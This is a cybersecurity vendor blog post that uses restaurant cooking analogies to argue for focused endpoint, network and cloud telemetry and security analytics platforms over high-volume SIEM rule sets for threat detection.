Emergency Incident ResponseReport a Confirmed or Potential Breach? Call +1 770-870-6343
0 Results Found
              Back To Results
                Close
                Leadership

                What is the Recipe for Threat Detection?

                Misconceptions about tools and tactics mess with the ingredient mix needed to mitigate risk. By: Matt DeMatteo

                I grew up in a family restaurant and learned to cook around age 8. My food wasn't good, though. It was too busy. I was trying too hard. A simple lesson all good cooks know is that less is more. Too many ingredients and spices make dishes bland because nothing stands out.

                After working in cybersecurity for the past decade, I can confidently say the same logic applies to threat detection. You can't throw everything into a pot and hope to get a good outcome. The right data, used in the right way, can provide much better outcomes than a strategy that is based on data volume.

                SIEMs: Too Many Cooks Spoil the Broth

                Threat detection is undeniably a data problem. It is logical that there should be a data-focused solution. Enter the SIEM. SIEMs started to come onto the market around 2005. When I worked as a Security Analyst, simply presenting me with the relevant Firewall, IDS, AV, and OS logs was sufficient to identify a true positive security issue. But much has changed since 2005.

                Today, security controls such as NGFW and NGAV do a great job at preventing known threats to reduce the overall event volume an organization has to deal with. However, most controls do a poor job of providing granular information, what we call telemetry, that can be used to detect threats that have not been prevented. Typical SIEM deployments aim to detect threats by allowing users to configure rules so that a manageable number of qualified alerts are produced. The problem is, a broken clock is right twice a day. Most organizations spend a lot of effort to get their SIEMs into a state where event volume is manageable only to discover the alerts are mostly false positives. They then seek out additional security controls and integrations only to discover that the SIEM needs more – more tuning, more storage, more processing power. The process of playing with the volume knobs, spending more on consulting, and dealing with false positives continues. None of this dissuades the adversary in any way.

                The Best Dishes are Made with The Best Ingredients

                Starting with the premise that threat detection is the practice of automatically finding suspicious or malicious activity that has NOT been prevented by security controls, let us look at what ingredients should be in our threat detection recipe.

                • Endpoint Telemetry – This is the most basic ingredient of threat detection. Adversaries who are not stopped by security controls very often establish a foothold in an organization through a workstation or server. From there, "Living off the Land" techniques are employed. You can check out the LOLBAS Github project (Living off The Land Binaries and Scripts) to understand more about Living off the Land techniques. Endpoint telemetry from well instrumented EDR, NGAV, and similar endpoint tools provides the raw data needed to detect Living off the Land activity. This activity can typically be caught early in the intrusion process (during discovery, defensive evasion, lateral movement, and data collection). You can read more about Living off the Land and other findings from hundreds of our incident response engagements by downloading the free Incident Response Insights Report.
                • Network Telemetry – NGFWs and other network security controls still have a critical part to play in threat detection, but not in the way that most SIEMs process the data. Most SIEMs look to prioritize alerts from network controls by using rules and correlation to upgrade or downgrade the alert from the vendor's default. There are simply too many alerts generated by most network controls for this strategy to work. Network Telemetry should be used to ensure you are capturing as many netflows and DNS requests going in and out of the environment as possible. This is critical because not every IP enabled device can run EDR/NGAV tools, but they can all be compromised. Statistical analysis of netflows alone can yield true-positive alerts, but the ratio of true to false positives tends to be very low. (A great, short outline of pros and cons of this approach can be found in a blog post by Anton Chuvakin). Correlating alerts and netflows with higher fidelity information helps in investigations.
                • Cloud Telemetry – As more workloads, applications, and IT assets are moving to cloud models, telemetry from various cloud applications and APIs is critical to achieving full visibility across an organization. Universally, data and events about authentication and user activity in the cloud is essential. Some organizations may have additional value in gathering application or transaction data, but almost all notable breaches involving cloud assets or service hinged on credential theft, abuse, or access permissions. In other words, not "hacking" in the academic sense, just good 'ole fashion theft and fraud.

                Chop, Dice, Simmer, and Stir

                Once you have collected the ingredients for your threat detection recipe it is time to prep them. The most common way to process all this data is with a SIEM. This technology varies in all dimensions – Gartner's MQ for SIEMs (2018) evaluates more than 15 SIEMs, and that is only scratching the surface. In general, however, SIEMs take a conveyor-belt approach to processing data. As logs are ingested, they are evaluated against rules in order to assign a criticality or severity to the event. Certain SIEMs can do analysis such as historical look backs and evaluate patterns of activity over time. But, the burden on the systems to keep up with the real-time processing of logs, running queries and reports, and providing a stable GUI and UX makes the investment needed too high for most organizations. In the end, the SIEM gets maxed out with its basic functions: log retention and querying. While log retention and querying are important, they are no substitutes for threat detection.

                The proper way to prepare all these ingredients is with a security analytics platform. These typically handle data ingestion and data analysis in a different way than SIEMs. A wide variety of security data can be easily ingested into the platforms, including the three types highlighted above – endpoint telemetry, network telemetry, and cloud telemetry. Security analytics platforms can process and enrich logs when they are ingested, including tagging or annotations that are added to the processed event. This is a more advanced version of the categorization that SIEMs do (usually by data source type). And lastly, security analytics platforms tend to decouple the collection and processing of logs from the analysis and flagging of suspicious or malicious activity. They do this by having a list of distinct analytics – each purpose-built to find or highlight certain activity – and having those analytics run against the processed data. By processing the data first, the analytics can operate much faster.

                The benefits in the end are two-fold. First, the system generates alerts that are higher fidelity than can be achieved by applying Boolean rules or Regular Expressions to essentially unenriched data. Secondly, a lot of the initial steps of an investigation have already been performed and are easily reviewed because those steps were a part of the automated analysis.

                Simplify and Prosper

                One of the biggest preventable expenses in running a restaurant is spoilage – raw ingredients going rotten. This is caused by a poor understanding of how much food you need in the cooler, how much you're using, and what customers are ordering. When security programs aim to "collect all the things" they put a huge burden on all parts of their program – Too much investment is made in the systems for collecting, storing, and processing all the data. Too many consulting hours are spent on keeping the architecture functioning. Too many alerts cause analysts to burn out or to enact triage processes that may result in critical things being missed. The core of your threat detection strategy should be lean and mean. Once that core is established and showing results, decisions about what technologies or policies are needed can be made with greater confidence.

                As an adversarial pursuit, security is all about balance and every asset pulling its weight. Log retention, compliance reporting, and raw log query capabilities are all important but when it comes to risk, threat detection is paramount.

                Getting Past Use-Case FOMO

                The main challenge for organizations trying to align their threat detection capabilities and their investments in different platforms is a fear of missing out on theoretical use-cases. Security analysis and threat detection evolved from simply processing security alerts from OS, Apps, IDS, and FWs to Boolean logic rules. These stated that if X and Y happen, without Z, in T time frame, create an alert. This drove an industry-wide cry for extensive use-case development. This trend was encouraged by vendors selling data storage, processing power, and pay-by-volume models. It was also inadvertently supported by the proliferation of security conferences and security researchers. Every speech touted another thing you can't believe can be hacked, or an unstoppable way to bypass your expensive security devices. The conclusion many practitioners made is that their use-case library needed to grow from tens, to hundreds, to thousands.

                The truth is 1+1 equals 2, not 3. A huge majority of use cases either generate too many false positives or are too narrow. While narrow use cases can catch a true positive, a small change in adversary tactics can slip through unnoticed.

                Security analytics platforms replace use-cases with specific algorithms that analyze one small piece that goes into the overall picture. Examples of some common analytics are UEBA, anomalous IP or Domain connections, and suspicious system behavior. When those ingredients are mixed together, a small number of high-quality alerts come out of the oven.

                Focus on What You Can Do Well

                If you own a restaurant and it's losing money, your best bet is to do less. Simplify your menu, pare down your list of ingredients, emphasize quality, and focus on being unique. The security industry offers broad guidance to all comers – collect more, store more, analyze more…more, more, more. But my message is: Don't do more, do right. Through the combination of your industry, budget, risk profile, user population, intellectual property, valuable assets, technology stack, and security program, your organization is unique. A security program must evolve, and that evolution can't happen if there is a focus on collecting 100% of data. The burden of getting to 100% is too great and doesn't even provide the value people expect. Set your sights on achieving what you need to be successful and have those goals vetted and tested by outside experts.


                Related Content